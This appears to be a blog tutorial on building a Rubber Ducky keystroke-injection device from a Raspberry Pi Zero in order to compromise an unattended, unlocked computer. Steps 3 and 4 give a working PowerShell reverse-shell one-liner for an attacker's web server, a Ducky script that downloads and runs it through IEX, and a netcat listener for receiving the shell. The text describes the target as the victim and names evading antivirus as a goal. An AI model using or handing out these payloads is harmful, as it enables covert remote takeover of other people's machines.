This post shows you how to create a USB Rubber Ducky using an out the box Raspberry Pi Zero. A Rubber Ducky is a product from Hak5 that pretends to be a keyboard and runs commands as if there was a human pressing on the keys, with no input required. This means a person can plug it into your unlocked computer, install whatever malware they want, and be gone within ~10 seconds. Traditional anti-virus won’t detect this, and it will even work on computers where USB Mass Storage is disabled.

As the real Rubber Ducky is around $45 and difficult to get in the UK, I decided to make my own using a Raspberry Pi Zero, although this guide should also work for any other version of Raspberry Pi as well.

Prerequisites

Before you begin, make sure you have the following:

A Raspberry Pi Zero with a micro SD card that is at least 2GB

A male USB to male microUSB (The normal cable for charging most gadgets)

A Windows machine with the ability to read micro SD cards

Step 1: Prepare the DuckBerry Pi Image

Visit this link and download the DuckBerry Pi image (437mb).

Extract the duckberrypi_zero_miniban_05.img file to your desktop.

Step 2: Write DuckBerry Pi Image to SD Card

Download Rufus , a tool for creating bootable USB drives, and then insert the micro SD card into your machine and check that it’s empty (Note: All data will be lost in the next step)

Run Rufus and select your SD card from the drop down menu at the top.

From the bootable disk drop down, select DD Image and navigate to your recently extracted .img file:

Click Start and confirm you’re happy for all data to be erased:

Confirm writing has started and wait until it’s finished (~3 minutes):

Step 3: Customise Rubber Ducky

The next step is to create the Rubber Ducky script to be executed when we insert this into the victims machine.

Writing your own Rubbery Ducky scripts are easy, however there are many example scripts available on the Hak5 Git repo here.

For the purposes of this guide, we’re going to use the Reverse Shell payload found here to open a reverse shell to our attacking machine.

On your attackers machine, place a file in the root of your website called reverse.ps1 and paste this line of code:

$sm=(New-Object Net.Sockets.TCPClient("YOUR_IP",YOUR_PORT)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Replacing YOUR_IP and YOUR_PORT with the IP and port of your attackers machine. Confirm you can download it by going to http://your_ip/reverse.ps1 in your browser.

Open up the payload.dd file in the root directory of your SD card with Notepad++ (or similar) and paste this code:

DELAY 1000 GUI r DELAY 100 STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://YOUR_IP/reverse.ps1');" ENTER

(Note: Where victims will have English(UK) keyboard layouts you need to replace the ” symbols with @)

Save, eject your SD card, and place the card into your Pi.

Step 4: Launch Exploit

On your attacking machine, setup a netcat listener:

netcat -nlvp YOUR_PORT

Plug the Pi into your victim’s machine and wait for your shell!